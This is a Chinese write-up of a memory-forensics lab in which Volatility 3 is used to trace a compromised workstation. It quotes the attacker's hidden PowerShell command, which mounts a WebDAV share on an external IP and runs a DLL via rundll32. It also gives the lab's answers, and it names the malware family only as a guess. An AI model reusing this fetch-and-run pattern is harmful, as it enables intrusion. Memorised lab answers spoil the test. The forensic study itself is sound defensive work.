类别: 端点取证
场景: 作为一家领先金融机构的法务调查员,您的 SIEM 已在内部工作站上标记了可访问敏感财务数据的异常活动,表明存在潜在违规行为。对于来自受感染计算机的内存转储,您的任务是分析泄露指标,追踪异常的来源,并在评估其范围的同时遏制事件。
前言:
该实验室包含一个内存转储 (DMP) 文件,您必须使用 Volatility 3 对其进行分析。您可以从其 github 网站获取 volatility 3 python 脚本,或者(我首选的方式)安装其 python 库。
1.识别恶意进程的名称有助于了解攻击的性质。恶意进程的名称是什么?
执行python vol.py -f 192-Reveal.dmp windows.pslist
这里是提前知道了,执行python vol.py -f 192-Reveal.dmpwindows.pstree可以更详细查看
可以看到
- 命令行指定了 powershell.exe -windowstyle hidden,攻击者经常使用它来对用户隐藏 PowerShell 窗口并在后台执行命令 [T1564.003]。
- 命令 net use \\45.9.74.32@8888\davwwwroot\ 表示尝试连接到网络共享,这可能是尝试下载文件或访问外部托管的恶意内容 [T1071.001]。
- 该命令调用 rundll32 来执行 DLL 文件 (3435[.]dll),这是一种常见的恶意软件技术,无需将文件直接拖放到本地系统上即可执行代码,以逃避端点检测 [T1218.011]
所以可疑进程是:powershell.exe
2.了解恶意进程的父进程 ID (PPID) 有助于跟踪进程层次结构和了解攻击流。恶意进程的父 PID 是什么?
上面图可以看到父进程是 4120
3.确定恶意软件用于执行第二阶段有效负载的文件名对于识别后续恶意活动至关重要。恶意软件用于执行第二阶段有效负载的文件名是什么?
DLL 文件名可以在 windows.pstree 插件输出的恶意 powershell 进程命令行中找到,所以是3435.dll
4.识别远程服务器上的共享目录有助于追踪攻击者所针对的资源。远程服务器上正在访问的共享目录的名称是什么?
上面也有,是davwwwroot
5.描述使用 Windows 实用程序执行第二阶段有效负载以运行恶意文件的 MITRE ATT&CK 子技术 ID 是什么?
DLL 文件由 rundll32 调用,rundll32 是一个合法的 Windows 实用程序,允许用户执行存储在动态链接库 (DLL) 文件中的函数或命令。目标是通过合法方式执行恶意文件,而不必将其拖放到本地系统上,从而避免某些检测。
前往 MITRE ATT&CK®,并在 Defense Evasion tactic 下找到相关的子技术。
所以是T1218.011
5.识别运行恶意进程的用户名有助于评估被盗用的帐户及其潜在影响。恶意进程运行的用户名是什么?
python vol.py -f 192-Reveal.dmpwindows.session可以查看
所以是Elon
7.了解恶意软件家族的名称对于将攻击与已知威胁相关联并制定适当的防御措施至关重要。恶意软件家族的名称是什么?
直接微步查可疑ip
猜测是StrelaStealer
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
